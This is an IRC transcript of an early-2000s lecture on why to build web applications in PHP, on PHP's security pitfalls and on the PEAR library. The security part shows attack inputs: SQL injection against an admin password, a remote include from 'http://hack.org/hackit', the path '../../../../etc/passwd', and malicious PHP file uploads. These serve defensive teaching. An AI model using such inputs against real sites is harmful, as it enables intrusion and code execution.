Tomas VV Cox talk

ENGLISH

dani_ ok, it start here..

dani_ the lecture by Mr. Cox is titled "The new web

programmation: web and PHP"

programación: web y PHP) ENGLISH TRANSLATION HERE'

dani_ cox: well.. it's my first lecture

dani_ so.. don't be cruel with me ;)

programación: web y PHP) ENGLISH TRANSLATION HERE: "The new web

programmation: web and PHP"'

dani_ i'd like to divide the lecture in 4 parts

dani_ my idea es:

dani_ - why the new programmation?

dani_ - why PHP?

dani_ - security fails on web applications

dani_ - PEAR (PHP Group's Open Source Project)

dani_ so.. let's start

dani_ Everyday the need on being permanently connected will grow

(well, on occidental world)

dani_ It means that wherever we go we need to acces to any

information and have open channels to people to comunicate with us

dani_ wel, what have to do web on it?

dani_ the web is most universaly extended media by now

dani_ it exists to connect to a network almost wherever you whant

leonardop There's web browsers and the chance to access Internet

from almost any conceivable device today.

leonardop from traditional PCs, laptops, cell phones,

#qc

leonardop PDAs, to more exotic devices like household-electric,

cars or even clothing

leonardop Well, this provides a lot of resources and the result

of the

mixture of all this to a web service

leonardop and a database is something amazing. This means:

leonardop - Universal access

leonardop - Costs reduction for installation and maintenance (a

web app is the same for all the users)

JAO - Easy learning (you scarcerly need to know how to use the 4

buttons of your browser and to fill in web forms)

leonardop - Easy to learn (you just need to know how to use the

buttons in your browser and how to fill forms)

JAO - Cost reduction on implementacion.

dani_ I strongly belive that is cheeper a lot to implement an

application with a scripting language

dani_ free of boring debbuging process and using an easy

graphical toolkit like HTML

dani_ than a graphical application coded in Java or "Visual *"

leonardop - Easy access to multiple sources of information,

system files,

leonardop databases, other networks, etc.

leonardop Today, according to our experience in the web

development world, we've seen that many things that we thought unfeasible

in the past, are possible now thanks to web programming.

leonardop and they work really well

leonardop I'll mention some examples:

leonardop - Administrative tasks improvement (using workflow

procedures on the web)

leonardop (a database and XML have helped a lot here)

leonardop - Better communication with "virtual" personnel inside

a company (like technicians or agents that must travel to the client's

residence;

leonardop through webmail, forums, web chat o SMS from the web)

leonardop (The IRCG extension by Mr Sasha Schumman works

extremely well :)

leonardop - Speed and convenience for the users to access

information

leonardop (documentary management)

leonardop - Speed and convenience for users outside their works

(through wap applications)

leonardop Why PHP

leonardop .

leonardop .

leonardop .

FloodeR Somo numbers to explain this...

FloodeR http://www.netcraft.com

FloodeR 36,458,394 domain queried

FloodeR 1,046,426 ip

FloodeR 7,095,691 domains with php

FloodeR php installed in 19.46% of domains

FloodeR http://www.securityspace.com/s_survey/data/index.html

FloodeR More common apache extensions

FloodeR 2,693,434 Apache server evaluated

FloodeR 1,238,547 (45.98%) PHP

FloodeR 611,733 (22.71%) mod_ssl

FloodeR 521,126 (19.35%) OpenSSL

FloodeR 493,282 (18.31%) Frontpage

FloodeR 355,101 (13.18%) mod_perl

FloodeR 109,175 (4.05%) ApacheJServ

FloodeR Operating Systems

FloodeR ----------------

FloodeR UNIX (all variants) ,Win32 (NT/W95/W98/W2000) ,QNX ,MacOS

(WebTen)

FloodeR OSX ,OS/2 ,BeOS

FloodeR Web Server (UNIX, Win32)

FloodeR --------------

FloodeR CGI/FastCGI ,thttpd ,fhttpd ,phttpd ,ISAPI (IIS, Zeus)

FloodeR NSAPI

FloodeR Java servlet ,AOLServer ,Roxen/Caudium module

FloodeR Experimental

FloodeR Apache 2.0 module ,Tux ,pi3web

FloodeR Databases

FloodeR ---------

FloodeR

FloodeR Adabas D, Empress, IBM DB2 ,Informix ,Ingres ,Interbase

,Frontbase ,mSQL

FloodeR Direct MS-SQL ,MySQL ,ODBC ,Ovrimos ,Oracle (OCI7,OCI8)

,PostgreSQL

FloodeR Raima Velocis ,Solid ,Sybase ,DB++ ,dBase ,filePro

(read-only)

FloodeR dbm (ndbm, gdbm, Berkeley db)

FloodeR

FloodeR And as extras

FloodeR ----------

FloodeR Graphic Generation (Extensions suported)

FloodeR

FloodeR PDf, GD, Imlib2, ImageMagik, Flash, AT&T's GraphViz, SVG

FloodeR All this gives php the flexibility

FloodeR To have all that you can need

FloodeR And now come on to the funny :)

FloodeR

FloodeR The web programming is not as easy as appears in a first

look

FloodeR First

FloodeR All that you put in a web page can be easily falsed(I

explain)

FloodeR Second

FloodeR The access to a web application usually be to all the

world (This normally be a requisite)

FloodeR Some critical points:

* cox please tell me to be slower when needed

FloodeR The user lies all the time :)

FloodeR If you put in a form, the tipical <select> with some not

modificable options

FloodeR hope to receive some of the options that has specified

FloodeR In the web programming, the client (navigator) is the

element that take the control to send the data that the user has fill

FloodeR The client(navigator) take the user data and change it

into simple http

cox (actually "browser" :)

FloodeR Oh

FloodeR XD

FloodeR thanks

FloodeR We can see that by yourself, you can make an http

request, put any data and send to the page

FloodeR Taking trash our database integrity

dani_ this way you can crash the data base integrity

josh[shine.cmw.sld.cu]: Connection reset by peer)

dani_ (but normaly fixed by creating correct tables, KEYs, NOT

NULLs, REFERENCEs, CHECKs, ...)

dani_ - Not making properly char scapes when submitting data base

queries

dani_ hmm..

dani_ sorry.. keyboard problems ;)

dani_ thx cox.. i've problems with dollar

cox dani_: I'll paste those don't worry :)

dani_ imagine than i type a password like:         "hacker' where

dani_ in a form

cox

dani_ this way.. the resultant query will be:

cox

cox

cox

dani_ ouch, I've just updated the admins password :)

dani_ this kind of bugs have been xploited on undreds of web

applications like the

dani_ (i friend of mine have waken up a day and find that his

credibility was droped down and

dani_ and had been taken off from his admins job)

dani_ you must _Allways_  scape properly the variable chars when

comes from user entries

dani_ every time on the way the data base engine needs

leonardop - Opening files from the filesystem.

leonardop It should be avoided as much as possible

leonardop and if it's absolutely neccesary, then ideally the file

should

be selected

leonardop from a default list (like an array or something)

timeout)

leonardop As an example, let's consider a page that displays

different headers

leonardop depending on the skin that the user chose

leonardop we suppose $skin should store a safe value

leonardop include($skin . ".php");<leonardop> In this

scenario, all we need is to pass a string like "http://hack.org/hackit" as

the $skin value

leonardop to produce the inclusion of

leonardop "http://hack.org/hackit.php"

leonardop and the attacker gets to run his own PHP code with web

server permissions.

leonardop The famous first "virus" made in PHP was based on this

kind of things.

leonardop ## I've received some complaints about using the term

"hack" instead of "crack"

leonardop This lecture should be used to "hack" your own system

leonardop and not to "crack" others, ok? ;) ##

leonardop .

FloodeR Other tipical thing is not scape the name of the files

FloodeR For example, the user put "../../../../etc/passwd"

FloodeR Or to not scape the system commands that we are going to run

FloodeR Put the libraries out of document root

FloodeR A tipical structure of files

FloodeR List of files from document root of http://sillysite.com/

FloodeR index.php

FloodeR include/default.inc

FloodeR images/nogifs.png

FloodeR

FloodeR Its usually to use .inc extensions to refer to library files

FloodeR But it's usually that the .inc files

FloodeR don't be part of the extensions that the php runtime parse

FloodeR ## After conference we open a questions session ##

FloodeR If I call http://sillysite.com/include/default.inc

FloodeR All the php code appear to me as plain text

FloodeR Giving data as names, passowrd to databases, etc

FloodeR Uploads, or perdition :)

FloodeR Is too tipical to have the upload directory in document root

FloodeR Its too much dangerous, and exploitable

FloodeR Some considerations:

FloodeR A) Check the extensions of files that upload to the server

FloodeR ## Dangerous, not that it don't be necesary ##

FloodeR Example of why

FloodeR I upload hackit.php

FloodeR And go to http://sillysite.com/uploads/hackit.php

FloodeR The simple uploads service change into a easy service to

execute remote exploits :)

FloodeR (Apache servers be hacked by this)

FloodeR B) Don't scape file names

FloodeR I can upload a file called "../index.php", making a false

post, and if i have in the code something like "rename($userfile,

"uploads/" . $userfile_name);

FloodeR I can rewrite the index.php file with my code

FloodeR And a lot of things like

FloodeR have "register_globals" activated, and not inicializa the

variables

FloodeR (Some of this fails open vulnerabilities in PHPnuke)

FloodeR Or try to make secure the access to aplications with

$REFERER data

FloodeR (We must remenber that the browser send it and can be false)

dani_ i'll talk about PEAR shortly

dani_ PEAR - PHP Extension & Application Repository

dani_ PEAR is an Open Source project created by PHP Group whith

the goal of creating a big library

dani_ of cuality classes writen in HP

dani_ All them accessible from a common web repository

dani_ and easily installable by a packet mannaging sistem

dani_ (like RPM to take an idea)

dani_ The project was founded by Stig S.Bakken, a PHP Group member

josh[shine.cmw.sld.cu]: Connection reset by peer)

dani_ Stig and others have been the creators of Oracle's  PHP

extension, XML's one or all

dani_ languages compilation architecture on Unix plataforms

dani_ What shocked me is the fact that hi started the project 2 h

after his doughter Malin was borned

dani_ that's what I call a hacker.. :)

dani_ In PEAR you can find by now some quality software which

englobes a lot of features.

dani_ PEAR gets now contributions from the biggest hackers

dani_ people like Rasmus, Andrei, Bergman, Huges, ...

dani_ Some of them are on this lecture, like Richard Hayes

(funder of the widely used STMP mail sending class)

* cox this is RichyH :)

dani_ or Morgan(a Phorum 4 developer and now become  PEAR_Forum)

* cox this is Mog :)

dani_ the PEAR's star application today is the data base

abstraction class PEAR DB

dani_ last days we had a lot of movements around this point

dani_ by the classes unification proposal

dani_ to unificate all them in still one

dani_ there you can find the bloody war with Manuel Lemos (from

Metabase, Metal and phpclasses.uperdesign.com)

dani_ and John Limn (ADODB y phplens.com)

dani_ [21:38:41] <cox>       Bueno no me quiero enrrollar mas, solo

dani_ whell.. i don't want to extend any more..

dani_ in case any one want to read more about the interesting

world of PEAR:

dani_ http://pear.php.net (by now it's under development, there's

not much information)

dani_ pear-dev@lists.php.net (also available from news server at

news.php.net)

dani_ and to see which things you can find there I recomend:

dani_ http://cvs.php.net

dani_ at     /pear       and       /php4/pear

dani_ by the momment I think i've counted more than 80 classes

that englobes Dates, XML, Files, Networks, ...

dani_ ahh.. watch too at: http://pear.php.net (supoort and faq

sections)

dani_ ok.. that's all..

dani_ clap clap clap clap clap clap clap clap clap

dani_ clap clap clap clap clap clap clap clap clap

> clap clap clap clap clap clap clap clap clap clap

> clap clap clap clap clap clap clap clap clap clap

> clap clap clap clap clap clap clap clap clap clap

> clap clap clap clap clap clap clap clap clap clap

Mas información: